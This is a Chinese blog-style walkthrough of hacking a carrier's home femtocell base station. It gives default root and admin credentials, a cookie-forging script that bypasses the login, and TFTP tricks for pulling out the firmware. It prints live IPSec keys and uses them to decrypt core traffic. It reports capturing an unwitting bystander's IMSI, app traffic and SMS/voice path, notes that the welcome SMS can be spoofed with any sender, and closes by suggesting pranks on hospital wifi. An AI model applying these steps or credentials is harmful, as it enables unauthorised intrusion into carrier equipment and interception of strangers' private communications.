家庭基站(Femtocell,又称飞蜂窝,Femto本意是10的-15次方)是运营商为了解决室内覆盖问题而推出的基于IP网络的微型基站设备,通常部署在用户家中,甚至直接放在桌面上。 随着运营商网络建设基本完成,宏站基本不再增加,Femtocell作为网优阶段解决信号覆盖盲区最有效的手段,倍受运营商青睐。由于Femtocell通过IP与运营商核心网直接连接,并从用户侧来看,是完全合法的基站设备。

Femtocell一般安装在用户触手可及的位置上,这就使得一直躲在通信机房这一天然物理安全屏障庇护下的传统通信厂商,终于要接受天下黑客的检阅了。然而,传统通信厂商在开发过程中的安全意识淡薄,导致了通信设备的安全漏洞比比皆是。近年来,BlackHat、DEFCON等安全大会上多次曝出Femtocell的安全问题。

一、设备简介

如何获得一台Femtocell设备呢?

闲鱼。。。

渗透黑盒测试方法(入狱之前关于基站的一些记录)(1)

最大发射功率在30dBm,只有1W。而一般的GSM基站功率大约在20W左右。

Femtocell安装之后,效果的确非常好。原来室内GSM信号只有一格,偶尔会"无信号",屋里的手机经常打不通。Femtocell开机之后,信号顿时变成满格,但制式是GPRS。大家家里没信号的话,可以打电话给10086申请,而且申请也是免费的。而且后续的话,运营商已经在准备3G和4G的Femtocell了。比需要架室外和室内天线的直放站方案稳定很多,而且架设方便。

硬件组成

拆开发现里面有两块电路板,二者通过自定义标准的线缆相连,初步猜测线缆中至少有网络线缆4根。

一块是普通的WLAN AP,上面有Atheros的SoC芯片,与一般家用路由器无异。

渗透黑盒测试方法(入狱之前关于基站的一些记录)(2)

另一块用于射频的板卡,主要由以下三部分组成:

TI的345MHz的DSP ARM处理器OMAPL138B

Cyclone的FPGA

RF逆变器AD9365(左下角)

渗透黑盒测试方法(入狱之前关于基站的一些记录)(3)

渗透黑盒测试方法(入狱之前关于基站的一些记录)(4)

二、板卡渗透

可以直接telnet登录,然后就是一个拥有root权限的Linux shell了。

$ telnet 192.168.197.1

login: root

password: 5up

顺便提一句,这个密码应该是Atheros的参考设计板PB44的默认密码,很多厂商拿来都不改。在搜索引擎上以"5up"和"root"为关键词,可以搜索到不少有趣的东西。

并且发现上面的busybox基本没有裁剪,甚至连tcpdump功能都有。

于是,可以直接抓取到所有连上此WiFi的流量:

busybox tcpdump -i br0 not port 23

访问 http://192.168.197.241/C/userProcessFunction.asp?reqType=4&role=marketUser 获得用户名为

abmoc@24320

然后在USER.js里发现原有的登录绕过问题没有得到修复,于是在浏览器中打开Console,输入以下脚本即可登录:

SetCookie('role', 'marketUser');

SetCookie('username', 'abmoc@24320');

SetCookie('levels', [-2, 0, 1, 3, 11, 13, 15, 16]);

document.cookie = "loginFlag=1;";

window.top.location = 'main.asp?r=' Math.RANDom() '#index';

登录之后,我们就拥有了与运营商派过来开站的工程师完全一样的操作权限!

以下是一些管理界面截图:

渗透黑盒测试方法(入狱之前关于基站的一些记录)(5)

渗透黑盒测试方法(入狱之前关于基站的一些记录)(6)

渗透黑盒测试方法(入狱之前关于基站的一些记录)(7)

然而发现之前曝出的文件上传下载的接口,以及欢迎短信下发的接口代码已经完全被删除了!但是真的删除了吗?

看起来WEB上做不成啥事情,于是在UART插座接上串口线,转战硬件层。

首先看到引导信息时

CPU: TI OMAP-L138 - ARM926E (ARM)

Version: VxWorks 6.8

BSP version: 2.0/1

Creation date: Sep 26 2012, 10:26:36

发现跑的操作系统是VxWorks,引导结束之后,提示输入用户名和密码。暂时没有思路,于是尝试进入Boot模式。

在看到

Press any key to stop auto-boot...

之时,敲击键盘,进入VxWorks Boot。由于是一个陌生的环境,首先打问号看帮助。发现有几条命令可以用。

但是ls命令只能看文件名,不能看文件内容。此外,发现还有cp和rm两条命令可以用。面对着大把大把的文件,只能看文件名,不能看文件内容,好着急。

VxWorks正常引导开机之后,扫描了一下端口,发现UDP/69端口打开。这个是TFTP(Trivial File Transfer Protocol)的端口。许多嵌入式设备都使用TFTP协议来传输固件。

于是在电脑上试图上传一个本地文件:

$ tftp

tftp> connect 192.168.197.241

tftp> put a.txt

然后再尝试下载,发现

tftp> get a.txt

xx bytes transfered..

说明上传成功。重启之后,发现文件仍然可以被tftp get到。

然后进去VxWorks Boot,发现上传的文件在/tffs0/WLANBackup/里。看来,基站厂商还是对tftp的操作做了一些限制,把文件上传下载限制到了这个目录里面。

但是,不要忘了,我们在Boot模式下,还有cp和mv和rm命令。于是,剩下的工作就是辛苦的把其它目录的文件,一个一个地cp到wlanBackup目录里,然后再tftp get下来。

至此,我们就可以把VxWorks系统里的所有文件都拉回到本地,进行分析。

渗透黑盒测试方法(入狱之前关于基站的一些记录)(8)

然后四处看一看文件,发现/tffs0/common/startup.txt里面写着一行:

/tffs0/user2

十分可疑!

再调查一下/tffs0/user1目录中,把OAM.zip解压之后,发现就是乌云曝出有漏洞的那个版本的程序。

于是上传一个新的startup.txt,里面写成

/tffs0/user1

重启引导,发现之前的 debug / 2342@WAS_ap 密码就可以直接用了,以及文件上传下载,以及欢迎短信的漏洞就都可以利用了。利用方式在乌云的文章上已经有详细描述,在此不再赘述。

原来,基站厂家的工程师,在上一次全网设备更新的时候,没有删除有漏洞的程序,而是把新的程序放在了/tffs0/user2目录里面,然后通过startup.txt指过去了。

这样下发的短信,实际上是由"真基站"发送下来的,而且这种短信不需要Femtocell与核心网之间通信,核心网无从监管Femtocell下达的欢迎短信是什么,并且可以任意修改欢迎短信的发件人和内容。欢迎短信的功能,原本只是用于提示用户已经加入了新的小区而已,这是系统的设计漏洞。此外,它的ARFCN和CellID等参数与真基站无异,这样一来,试图通过基站参数进行伪基站检测的方案都将失效。

继续调查,发现VxWorks版卡的串口输出中有如下字样:

secIpAddr:111.206.50.34

seckey:combaipsec2011

secUseImsi:9999990000xxxxx

ipSecRekeyTime:80000minutes

liveness:0

comba_usim_card_auth: use virtual usim card.

mac ok

0xc474d788 (ipiked):

ipsecStart() done

Ipsec Ip : 10.37.52.240

Enc key inbound:9ab3eb22 2b4917e1 4a50ddae e4e5f3ba 064494c6 f1cc6873

Enc key outbound:f8ac6c27 c4000a72 dd26156c afff5c99 9ea2894e 429ef824

Auth key inbound:152b81aa 92456554 6f1cbb38 2f5461c8 33e2211d

Auth key outbound:e6af8105 b73edc29 13791638 3f8c65fc 224c0688

add net 10.1.0.0: netmask 255.255.0.0: gateway 10.37.52.240

add net 172.16.15.0: netmask 255.255.255.0: gateway 10.37.52.240

add host 111.206.50.34: gateway 192.168.197.1

上面日志里打出的

seckey:combaipsec2011

,在相关的论文中也有描述,是开发过程中,项目组为了方便调试,使用的IPSec PSK认证方式,在投入生产环境部署的时候,已经关闭了这种认证方式了。

现在IPSec使用的认证方式是EAP-AKA,基于模拟USIM卡的认证。具体细节可以参阅RFC4187。

EAP-AKA的认证方式,简单描述如下:

局端的SeGW(Security Gateway, 实际上是IPSec Server)后面跟着一个RADIUS认证服务器,里面写了若干条认证五元组(Quintuplet)。

IMSI: RAND,XRES,CK,IK,AUTN

认证开始时,Femtocell先上报自身的IMSI。SeGW收到认证请求后,取出与IMSI对应的一条五元组,并把这条五元组标记为已经使用。将里面的随机数挑战RAND和鉴权令牌AUTN发给Femtocell。Femtocell先通过验证AUTN,从而验证SeGW是否是真的。验证通过之后,再根据Femtocell装载的USIM卡里的Ki和OPc密钥,以及随机数挑战RAND,算出一个应答RES和两个密钥CK和IK。然后把RES传回给SeGW,SeGW核对RES和存在五元组里的XRES是否一致,从而完成对手机的认证。注意,协商出来的密钥CK和IK,在全过程中不会被传输,传输的只是RAND和XRES以及AUTN,即使通信被窃听,也无法获得加密密钥。

以上即是Femtocell与SeGW之间的认证过程。实际上,把"Femtocell"的字眼换成"手机","SeGW"的字眼换成"基站",就描述了手机与基站之间的认证过程,两种场景下的认证过程基本上是一致的。

首先对VxWorks建立IPSec隧道时的IKEv2(UDP 500端口)的协议抓包分析,得到它协商出的加密方式如下:

Encryption Algorithm : ENCR_3DES

Integrity Algorithm : AUTH_HMAC_SHA1_96

Pseudo-random Function (PRF) : PRF_HMAC_SHA1

Diffie-Hellman Group (D-H): Alternate 1024-bit MODP group

于是,打开Wireshark,在抓到的ESP(Encapsulating Security Payload)包上面,右键,将上述输出中的Enc key填写到Wireshark的Encryption Key字段,将上述输出中的Auth key填写到Wireshark的Authentication Key字段中。

注意,IPSec隧道流量的两个方向,分属不同的 SA(Security Association) 和 SPI(Security Parameter Index),因此需要把inbound这一组Key应用到SeGW->Femtocell方向的流量上,并且把outbound这一组Key应用到Femtocell->SeGW方向的流量上。

上述日志打出的Key,需要改写成形如0x9ab3eb222b4917e14a50ddaee4e5f3ba064494c6f1cc6873之后,才可以填入Wireshark中。

渗透黑盒测试方法(入狱之前关于基站的一些记录)(9)

填写完成之后,原来只能显示为ESP的数据包,即被解密。

继续分析,发现解密后的数据包有以下几种类型:

HNBAP: Home Node-B Application Part

RANAP: Radio Access Network Application Part

ICMP: Internet Control Message Protocol (就是ping啦)

RTP: Real-time Transport Protocol

SCTP: Stream Control Transmission Protocol (上面还有SS7,7号信令)

NTP: Network Time Protocol (用于Femtocell上电校时)

GTP: GPRS Tunneling Protocol (手机的数据流量)

这些协议之间的关系如下图所示:

渗透黑盒测试方法(入狱之前关于基站的一些记录)(10)

下图中,可以看到以GTP形式封装的用户数据,里面有一个HTTP请求。

渗透黑盒测试方法(入狱之前关于基站的一些记录)(11)

下图中,看到Femtocell开机之后,正在使用NTP协议进行时间校准。

渗透黑盒测试方法(入狱之前关于基站的一些记录)(12)

下图中,可以看到Femtocell向上发起注册请求,以及SeGW下发的注册成功的消息。并且,LAC(Location Aera Code)也在数据报文中。

渗透黑盒测试方法(入狱之前关于基站的一些记录)(13)

特别注意到的是,附近某个人在不知情的情况下,连上了这台Femtocell。可以看到这台手机的型号是三星 GT-I9308,跑着Android 4.3系统,手机后台通过GPRS产生的流量,被我们看的清清楚楚。

渗透黑盒测试方法(入狱之前关于基站的一些记录)(14)

下图中可以看出,后台有360和QQ在上传的一些统计信息。

渗透黑盒测试方法(入狱之前关于基站的一些记录)(15)

渗透黑盒测试方法(入狱之前关于基站的一些记录)(16)

渗透黑盒测试方法(入狱之前关于基站的一些记录)(17)

下图中可以看到,我们还捕获到了用户的IMSI号,并且可以通过反查来得到用户的手机号前几位。

渗透黑盒测试方法(入狱之前关于基站的一些记录)(18)

用户的语音和短信在RTP报文里。

123456789012345567890123456789012345678901234567

123456789012345567890123456789012345678901234567

9999990000*****@strongswan.org

上述文件是/tffs0/common/imsi.cfg。 其中写了虚拟IMSI参数: Ki和OPc密钥,以及IMSI号。这些参数供Femtocell与通信机房里的SeGW(Security Gateway, 实际上是IPSec网关)建立安全连接。

Femtocell与SeGW之间的IPSec协议建立,需要使用真实的USIM卡,来完成基于EAP-AKA的双向鉴权。Femtocell设备的底部即有一个USIM卡插槽。但是厂家为了调测以及管理方便,使用了虚拟USIM卡的方案,把鉴权所需要的参数,写在上述imsi.cfg文件中,这样便无需管理大量的USIM卡。

真实的USIM卡中存的也只有IMSI/Ki/OPc三个参数,因此只需要把上述三个参数写到文件中,并在VxWorks程序中模拟3GPP中所需要的Milenage算法,即可完成相应的EAP-AKA鉴权过程。

关于Femtocell对应的SeGW,在《基于IPSec-VPN的数字证书认证技术的研究与实现》论文中有提到,使用了Radisys公司的解决方案,是刀片式计算机,搭载有Cavium公司的OCTEON处理器。

如果后续继续对取得的VxWorks固件进行逆向分析,将有可能模拟出登录过程,从而使用IPSec VPN拨通SeGW,从而连入Femtocell通信内网。

50005端口只允许被WLAN板卡 192.168.197.1 访问。

简单抓包分析发现,这是厂家自定义的一种通信协议,供WLAN板卡读取此端口以获得RF板卡的工作状态。并且工作状态在WLAN板卡的/tmp/目录下有对应的文件记录。

VxWorks板卡网页的的登录密码位于 /tffs0/user2/OAM/software/web/web_page.xml 里

abmoc@24320 e29c21956e290b8e76b22bec66f4e8c7

comba e10adc3949ba59abbe56e057f20f883e (即123456)

admin e10adc3949ba59abbe56e057f20f883e (即123456)

Comba_IB-WAS 1ebe493b3a9ba02373190df07d031964 (即2342@WAS_ap)

位于 /tffs0/user1/oam.db,依然是sqlite数据库。

此外,我们在Femtocell的网页Javascript中,也发现了针对TD-SCDMA、4G等版本的适配代码。通过其它渠道也得知,运营商正在积极地推进4G Femtocell的部署。

三、后记

跟别人恶作剧,医院wifi挺好。

切勿用于非法用途。


探讨渗透测试及黑客技术,请关注并私信我。#小白入行网络安全# #安界网人才培养计划#

,